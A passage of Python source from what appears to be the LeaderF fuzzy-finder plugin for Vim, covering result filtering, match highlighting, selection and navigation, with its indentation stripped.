getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern, encoding)
if "--no-sort" in self._arguments:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeightNoSort)
elif self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights)
if self._cli.isAndMode:
if self._fuzzy_engine and isAscii(''.join(self._cli.pattern)):
step = 20000 * cpu_count
else:
step = 10000
pair, highlight_methods = self._filter(step, filter_method, content, is_continue)
if do_sort:
pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
else:
self._result_content = pair[1]
elif use_fuzzy_engine:
if step == 0:
if return_index == True:
step = 30000 * cpu_count
else:
step = 60000 * cpu_count
_, self._result_content = self._filter(step, filter_method, content, is_continue, True, return_index)
else:
if step == 0:
if use_fuzzy_match_c:
step = 60000
elif self._getExplorer().supportsNameOnly() and self._cli.isFullPath:
step = 6000
else:
step = 12000
pairs = self._filter(step, filter_method, content, is_continue)
if "--no-sort" not in self._arguments:
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
if self._cli.isAndMode:
self._highlight_method = partial(self._highlight_and_mode, highlight_methods)
self._highlight_method()
else:
self._highlight_method = highlight_method
self._highlight_method()
if len(self._cli.pattern) > 1 and not is_continue:
lfCmd("redraw")
def _guessFilter(self, filename, suffix, dirname, icon, iterable):
"""
return a list, each item is a pair (weight, line)
"""
icon_len = len(icon)
return ((FuzzyMatch.getPathWeight(filename, suffix, dirname, line[icon_len:]), line) for line in iterable)
def _guessSearch(self, content, is_continue=False, step=0):
if self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
return
buffer_name = os.path.normpath(lfDecode(self._cur_buffer.name))
if lfEval("g:Lf_ShowRelativePath") == '1':
try:
buffer_name = os.path.relpath(buffer_name)
except ValueError:
pass
buffer_name = lfEncode(buffer_name)
dirname, basename = os.path.split(buffer_name)
filename, suffix = os.path.splitext(basename)
if lfEval("get(g:, 'Lf_ShowDevIcons', 1)") == "1":
icon = webDevIconsGetFileTypeSymbol(basename)
else:
icon = ''
if self._fuzzy_engine:
filter_method = partial(fuzzyEngine.guessMatch, engine=self._fuzzy_engine, filename=filename,
suffix=suffix, dirname=dirname, icon=icon, sort_results=True)
step = len(content)
_, self._result_content = self._filter(step, filter_method, content, is_continue, True)
else:
step = len(content)
filter_method = partial(self._guessFilter, filename, suffix, dirname, icon)
pairs = self._filter(step, filter_method, content, is_continue)
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def _highlight_and_mode(self, highlight_methods):
self._clearHighlights()
for i, highlight_method in enumerate(highlight_methods):
highlight_method(hl_group='Lf_hl_match' + str(i % 5))
def _clearHighlights(self):
if self._getInstance().getWinPos() == 'popup':
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._highlight_ids = []
def _clearHighlightsPos(self):
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
def _resetHighlights(self):
self._clearHighlights()
unit = self._getUnit()
bottom = len(self._getInstance().buffer) - self._help_length
if self._cli.isAndMode:
highlight_pos_list = self._highlight_pos_list
else:
highlight_pos_list = [self._highlight_pos]
for n, highlight_pos in enumerate(highlight_pos_list):
hl_group = 'Lf_hl_match' + str(n % 5)
for i, pos in enumerate(highlight_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")"""
% (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
for i, pos in enumerate(self._highlight_refine_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _highlight(self, is_full_path, get_highlights, use_fuzzy_engine=False, clear=True, hl_group='Lf_hl_match'):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
if clear:
self._clearHighlights()
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
if use_fuzzy_engine:
self._highlight_pos = get_highlights(source=[getDigest(line)
for line in content[:highlight_number:unit]])
else:
# e.g., self._highlight_pos = [ [ [2,3], [6,2] ], [ [1,4], [7,6], ... ], ... ]
# where [2, 3] indicates the highlight starts at the 2nd column with the
# length of 3 in bytes
self._highlight_pos = [get_highlights(getDigest(line))
for line in content[:highlight_number:unit]]
if self._cli.isAndMode:
self._highlight_pos_list.append(self._highlight_pos)
bottom = len(content)
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 0 if is_full_path else 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")"""
% (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
def _highlightRefine(self, first_get_highlights, get_highlights):
# matchaddpos() is introduced by Patch 7.4.330
if (lfEval("exists('*matchaddpos')") == '0' or
lfEval("g:Lf_HighlightIndividual") == '0'):
return
cb = self._getInstance().buffer
if self._getInstance().empty(): # buffer is empty.
return
highlight_number = int(lfEval("g:Lf_NumberOfHighlight"))
self._clearHighlights()
getDigest = self._getDigest
unit = self._getUnit()
if self._getInstance().isReverseOrder():
if self._help_length > 0:
content = cb[:-self._help_length][::-1]
else:
content = cb[:][::-1]
else:
content = cb[self._help_length:]
bottom = len(content)
self._highlight_pos = [first_get_highlights(getDigest(line, 1))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_pos):
start_pos = self._getDigestStartPos(content[unit*i], 1)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_match', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_match', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
self._highlight_refine_pos = [get_highlights(getDigest(line, 2))
for line in content[:highlight_number:unit]]
for i, pos in enumerate(self._highlight_refine_pos):
start_pos = self._getDigestStartPos(content[unit*i], 2)
if start_pos > 0:
for j in range(len(pos)):
pos[j][0] += start_pos
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('Lf_hl_matchRefine', %s)")"""
% (self._getInstance().getPopupWinId(), str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('Lf_hl_matchRefine', %s)" % str(pos[j:j+8])))
self._highlight_ids.append(id)
def _regexFilter(self, iterable):
def noErrMatch(text, pattern):
try:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text, pattern))
except TypeError: # python 2
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except ValueError: # python 3
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
except:
return '-1' != lfEval("g:LfNoErrMsgMatch('%s', '%s')" % (text.replace('\x00', '\x01'), pattern))
try:
if ('-2' == lfEval("g:LfNoErrMsgMatch('', '%s')" % escQuote(self._cli.pattern))):
return iter([])
else:
return (line for line in iterable
if noErrMatch(escQuote(self._getDigest(line, 0)), escQuote(self._cli.pattern)))
except vim.error:
return iter([])
def _regexSearch(self, content, is_continue, step):
if not is_continue and not self._cli.isPrefix:
self._index = 0
self._result_content = self._filter(8000, self._regexFilter, content, is_continue)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def clearSelections(self):
for i in self._selections.values():
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % i)
self._selections.clear()
def _cleanup(self):
if not ("--recall" in self._arguments or lfEval("g:Lf_RememberLastSearch") == '1'):
self._pattern_bak = self._cli.pattern
self._cli.clear()
self._clearHighlights()
self._clearHighlightsPos()
self._help_length = 0
self._show_help = False
@modifiableController
def toggleHelp(self):
self._show_help = not self._show_help
if self._getInstance().isReverseOrder():
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._createHelpHint()
self.clearSelections()
self._resetHighlights()
def _accept(self, file, mode, *args, **kwargs):
if file:
if self._getExplorer().getStlCategory() != "Jumps":
lfCmd("norm! m'")
if self._getExplorer().getStlCategory() != "Help":
if mode == '':
pass
elif mode == 'h':
lfCmd("split")
elif mode == 'v':
lfCmd("bel vsplit")
kwargs["mode"] = mode
tabpage_count = len(vim.tabpages)
self._acceptSelection(file, *args, **kwargs)
for k, v in self._cursorline_dict.items():
if k.valid:
k.options["cursorline"] = v
self._cursorline_dict.clear()
self._issue_422_set_option()
if mode == 't' and len(vim.tabpages) > tabpage_count:
tab_pos = int(lfEval("g:Lf_TabpagePosition"))
if tab_pos == 0:
lfCmd("tabm 0")
elif tab_pos == 1:
lfCmd("tabm -1")
elif tab_pos == 3:
lfCmd("tabm")
def accept(self, mode=''):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if self._getInstance().window.cursor[0] <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if self._getExplorer().getStlCategory() == "Rg":
if self._getInstance().currentLine == self._getExplorer().getContextSeparator():
return
if "--heading" in self._arguments and not re.match(r'^\d+[:-]', self._getInstance().currentLine):
return
self._cli.writeHistory(self._getExplorer().getStlCategory())
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
cwd = lfGetCwd()
if len(self._selections) > 0:
files = []
for i in sorted(self._selections.keys()):
files.append(self._getInstance().buffer[i-1])
if "--stayOpen" in self._arguments:
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if original buffer is an No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd()")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = lfGetCwd()
if mode == '' and self._getExplorer().getStlCategory() == "File":
self._accept(files[0], mode)
self._argaddFiles(files)
self._accept(files[0], mode)
lfCmd("doautocmd BufwinEnter")
else:
for file in files:
self._accept(file, mode)
if lfGetCwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
need_exit = True
else:
file = self._getInstance().currentLine
line_nr = self._getInstance().window.cursor[0]
need_exit = self._needExit(file, self._arguments)
if need_exit:
if "--stayOpen" in self._arguments:
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
try:
vim.current.tabpage, vim.current.window, vim.current.buffer = self._getInstance().getOriginalPos()
except vim.error: # error if original buffer is an No Name buffer
pass
else:
self._getInstance().exitBuffer()
# https://github.com/Yggdroot/LeaderF/issues/257
win_local_cwd = lfEval("getcwd()")
if cwd != win_local_cwd:
chdir(cwd)
orig_cwd = lfGetCwd()
self._accept(file, mode, self._getInstance().buffer, line_nr) # for bufTag
if lfGetCwd() != orig_cwd:
dir_changed_by_autocmd = True
else:
dir_changed_by_autocmd = False
if need_exit:
self._setAutochdir()
if dir_changed_by_autocmd == False:
self._restoreOrigCwd()
return None
else:
self._beforeExit()
self._content = vim.current.buffer[:]
return False
def _jumpNext(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] > len(instance.buffer) - self._help_length:
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
elif instance.window.cursor[0] == 1: # at the first line
instance.window.cursor = (len(instance.buffer) - self._help_length, 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow > len(instance.buffer) - instance.helpLength:
instance.cursorRow = len(instance.buffer) - instance.helpLength
line_nr = instance.cursorRow
elif instance.cursorRow == 1: # at the last line
line_nr = instance.cursorRow
instance.cursorRow = len(instance.buffer) - instance.helpLength
else:
line_nr = instance.cursorRow
instance.cursorRow -= 1
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE"
% (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1,
len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length:
instance.window.cursor = (self._help_length + 1, 0)
elif instance.window.cursor[0] == len(instance.buffer): # at the last line
instance.window.cursor = (self._help_length + 1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow <= instance.helpLength:
instance.cursorRow = instance.helpLength + 1
line_nr = instance.cursorRow
elif instance.cursorRow == len(instance.buffer): # at the last line
line_nr = instance.cursorRow
instance.cursorRow = instance.helpLength + 1
else:
line_nr = instance.cursorRow
instance.cursorRow += 1
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
return True
def _jumpPrevious(self):
instance = self._getInstance()
if instance.window is None or instance.empty() or len(instance.buffer) == self._help_length:
return False
if instance.isReverseOrder():
if instance.window.valid:
if instance.window.cursor[0] >= len(instance.buffer) - self._help_length:
instance.window.cursor = (1, 0)
else:
instance.window.cursor = (instance.window.cursor[0] + 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow >= len(instance.buffer) - instance.helpLength:
instance.cursorRow = 1
line_nr = instance.cursorRow
else:
line_nr = instance.cursorRow
instance.cursorRow += 1
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE"
% (len(instance.buffer) - instance.cursorRow - instance.helpLength + 1,
len(instance.buffer) - instance.helpLength))
else:
if instance.window.valid and self._getInstance().getWinPos() != 'popup':
if instance.window.cursor[0] <= self._help_length + 1:
instance.window.cursor = (len(instance.buffer), 0)
else:
instance.window.cursor = (instance.window.cursor[0] - 1, 0)
instance.window.options["cursorline"] = True
instance.gotoOriginalWindow()
line_nr = self._getInstance().window.cursor[0]
self._accept(instance.buffer[instance.window.cursor[0] - 1], "", self._getInstance().buffer, line_nr)
else:
if instance.cursorRow <= instance.helpLength + 1:
instance.cursorRow = len(instance.buffer)
line_nr = instance.cursorRow
else:
line_nr = instance.cursorRow
instance.cursorRow -= 1
self._accept(instance.buffer[instance.cursorRow - 1], "", self._getInstance().buffer, line_nr)
lfCmd("echohl WarningMsg | redraw | echo ' (%d of %d)' | echohl NONE" % \
(instance.cursorRow - instance.helpLength, len(instance.buffer) - instance.helpLength))
def quit(self):
self._getInstance().exitBuffer()
self._setAutochdir()
self._restoreOrigCwd()
def refresh(self, normal_mode=True):
self._getExplorer().cleanup()
content = self._getExplorer().getFreshContent()
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
if normal_mode: # when called in Normal mode
self._getInstance().buffer.options['modifiable'] = True
self._clearHighlights()
self._clearHighlightsPos()
self.clearSelections()
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._iteration_end = True
if self._cli.pattern:
self._index = 0
self._search(self._content)
if normal_mode: # when called in Normal mode
self._createHelpHint()
self._resetHighlights()
self._getInstance().buffer.options['modifiable'] = False
def addSelections(self):
nr = self._getInstance().window.number
if self._getInstance().getWinPos() != 'popup':
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
line_nr = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
if line_nr > len(self._getInstance().buffer) - self._help_length:
lfCmd("norm! k")
return
else:
if line_nr <= self._help_length:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! j')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("norm! j")
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
return
if line_nr in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call matchdelete(%d, %d)" % (self._selections[line_nr], self._getInstance().getPopupWinId()))
else:
lfCmd("call matchdelete(%d)" % self._selections[line_nr])
del self._selections[line_nr]
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), line_nr))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % line_nr))
self._selections[line_nr] = id
def selectMulti(self):
orig_line = self._getInstance().window.cursor[0]
nr = self._getInstance().window.number
if (int(lfEval("v:mouse_win")) != 0 and
nr != int(lfEval("v:mouse_win"))):
return
elif nr == int(lfEval("v:mouse_win")):
cur_line = int(lfEval("v:mouse_lnum"))
self.clearSelections()
for i in range(min(orig_line, cur_line), max(orig_line, cur_line)+1):
if i > self._help_length and i not in self._selections:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i)))
self._selections[i] = id
def selectAll(self):
line_num = len(self._getInstance().buffer)
if line_num > 300:
lfCmd("echohl Error | redraw | echo ' Too many files selected!' | echohl NONE")
lfCmd("sleep 1")
return
for i in range(line_num):
if i >= self._help_length and i+1 not in self._selections:
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_selection', '\\\\%%%dl.')")"""
% (self._getInstance().getPopupWinId(), i+1))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchadd('Lf_hl_selection', '\%%%dl.')" % (i+1)))
self._selections[i+1] = id
def _gotoFirstLine(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute({}, 'norm! gg')".format(self._getInstance().getPopupWinId()))
else:
lfCmd("normal! gg")
def _readFinished(self):
pass
def startExplorer(self, win_pos, *args, **kwargs):
arguments_dict = kwargs.get("arguments", {})
if "--recall" in arguments_dict:
self._arguments["--recall"] = arguments_dict["--recall"]
elif "--previous" in arguments_dict:
self._arguments["--previous"] = arguments_dict["--previous"]
elif "--next" in arguments_dict:
self._arguments["--next"] = arguments_dict["--next"]
else:
self.setArguments(arguments_dict)
self._cli.setArguments(arguments_dict)
self._cli.setNameOnlyFeature(self._getExplorer().supportsNameOnly())
self._cli.setRefineFeature(self._supportsRefine())
self._orig_line = ''
if self._getExplorer().getStlCategory() in ["Gtags"]:
if "--update" in self._arguments or "--remove" in self._arguments:
self._getExplorer().getContent(*args, **kwargs)
return
if "--next" in arguments_dict:
if self._jumpNext() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
elif "--previous" in arguments_dict:
if self._jumpPrevious() == False:
lfCmd("echohl Error | redraw | echo 'Error, no content!' | echohl NONE")
return
self._cleanup()
# lfCmd("echohl WarningMsg | redraw | echo ' searching ...' | echohl NONE")
self._getInstance().setArguments(self._arguments)
empty_query = self._empty_query and self._getExplorer().getStlCategory() in ["File"]
remember_last_status = "--recall" in self._arguments \
or lfEval("g:Lf_RememberLastSearch") == '1' and self._cli.pattern
if remember_last_status:
content = self._content
self._getInstance().useLastReverseOrder()
win_pos = self._getInstance().getWinPos()
else:
content = self._getExplorer().getContent(*args, **kwargs)
self._getInstance().setCwd(lfGetCwd())
if self._getExplorer().getStlCategory() in ["Gtags"] and "--auto-jump" in self._arguments \
and isinstance(content, list) and len(content) == 1:
mode = self._arguments["--auto-jump"][0] if len(self._arguments["--auto-jump"]) else ""
self._accept(content[0], mode)
return
self._index = 0
pattern = kwargs.get("pattern", "") or arguments_dict.get("--input", [""])[0]
if len(pattern) > 1 and (pattern[0] == '"' and pattern[-1] == '"'
or pattern[0] == "'" and pattern[-1] == "'"):
pattern = pattern[1:-1]
self._cli.setPattern(pattern)
self._result_content = []
self._cb_content = []
if not content:
lfCmd("echohl Error | redraw | echo ' No content!' | echohl NONE")
return
# clear the buffer only when the content is not a list
self._getInstance().enterBuffer(win_pos, not isinstance(content, list))
self._initial_count = self._getInstance().getInitialWinHeight()
self._getInstance().setStlCategory(self._getExplorer().getStlCategory())
self._setStlMode(**kwargs)
self._getInstance().setStlCwd(self._getExplorer().getStlCurDir())
if kwargs.get('bang', 0):
self._current_mode = 'NORMAL'
else:
self._current_mode = 'INPUT'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
if not remember_last_status:
self._gotoFirstLine()
self._start_time = time.time()
self._bang_start_time = self._start_time
self._bang_count = 0
self._getInstance().buffer.vars['Lf_category'] = self._getExplorer().getStlCategory()
self._read_content_exception = None
if isinstance(content, list):
self._is_content_list = True
self._read_finished = 2
if not remember_last_status:
if len(content[0]) == len(content[0].rstrip("\r\n")):
self._content = content
else:
self._content = [line.rstrip("\r\n") for line in content]
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlResultsCount(len(self._content))
if not empty_query:
self._getInstance().setBuffer(self._content[:self._initial_count])
if lfEval("has('nvim')") == '1':
lfCmd("redrawstatus")
self._callback = self._workInIdle
if not kwargs.get('bang', 0):
self._readFinished()
self.input()
else:
if not remember_last_status and not empty_query:
self._getInstance().appendBuffer(self._content[self._initial_count:])
elif remember_last_status and len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
lfCmd("echo")
if self._cli.pattern:
self._cli._buildPrompt()
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
if not remember_last_status and not self._cli.pattern and empty_query:
self._gotoFirstLine()
self._guessSearch(self._content)
if self._result_content: # self._result_content is [] only if
# self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
else:
self._getInstance().appendBuffer(self._content[self._initial_count:])
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
self._bangReadFinished()
lfCmd("echohl WarningMsg | redraw | echo ' Done!' | echohl NONE")
elif isinstance(content, AsyncExecutor.Result):
self._is_content_list = False
self._callback = self._workInIdle
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
if self._getExplorer().getStlCategory() in ["Rg", "Gtags"]:
if "--append" in self.getArguments():
self._offset_in_content = len(self._content)
if self._pattern_bak:
self._getInstance().setBuffer(self._content, need_copy=False)
self._createHelpHint()
else:
self._getInstance().clearBuffer()
self._content = []
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
self._stop_reader_thread = False
self._reader_thread = threading.Thread(target=self._readContent, args=(content,))
self._reader_thread.daemon = True
self._reader_thread.start()
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
else:
self._is_content_list = False
self._callback = partial(self._workInIdle, content)
if lfEval("get(g:, 'Lf_NoAsync', 0)") == '1':
self._content = self._getInstance().initBuffer(content, self._getUnit(), self._getExplorer().setContent)
self._read_finished = 1
self._offset_in_content = 0
else:
self._content = []
self._offset_in_content = 0
self._read_finished = 0
if not kwargs.get('bang', 0):
self.input()
else:
lfCmd("echo")
self._getInstance().buffer.options['modifiable'] = False
self._bangEnter()
self._getInstance().mimicCursor()
def _readContent(self, content):
try:
for line in content:
self._content.append(line)
if self._stop_reader_thread:
break
else:
self._read_finished = 1
except Exception:
self._read_finished = 1
self._read_content_exception = sys.exc_info()
def _setResultContent(self):
if len(self._result_content) > len(self._getInstance().buffer):
self._getInstance().setBuffer(self._result_content)
elif self._index == 0:
self._getInstance().setBuffer(self._content, need_copy=True)
@catchException
def _workInIdle(self, content=None, bang=False):
if self._read_content_exception is not None:
if bang == True:
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
lfPrintError(self._read_content_exception[1])
return
else:
raise self._read_content_exception[1]
if bang == False and self._preview_open == False and lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1' \
and not self._getInstance().empty():
self._previewResult(False)
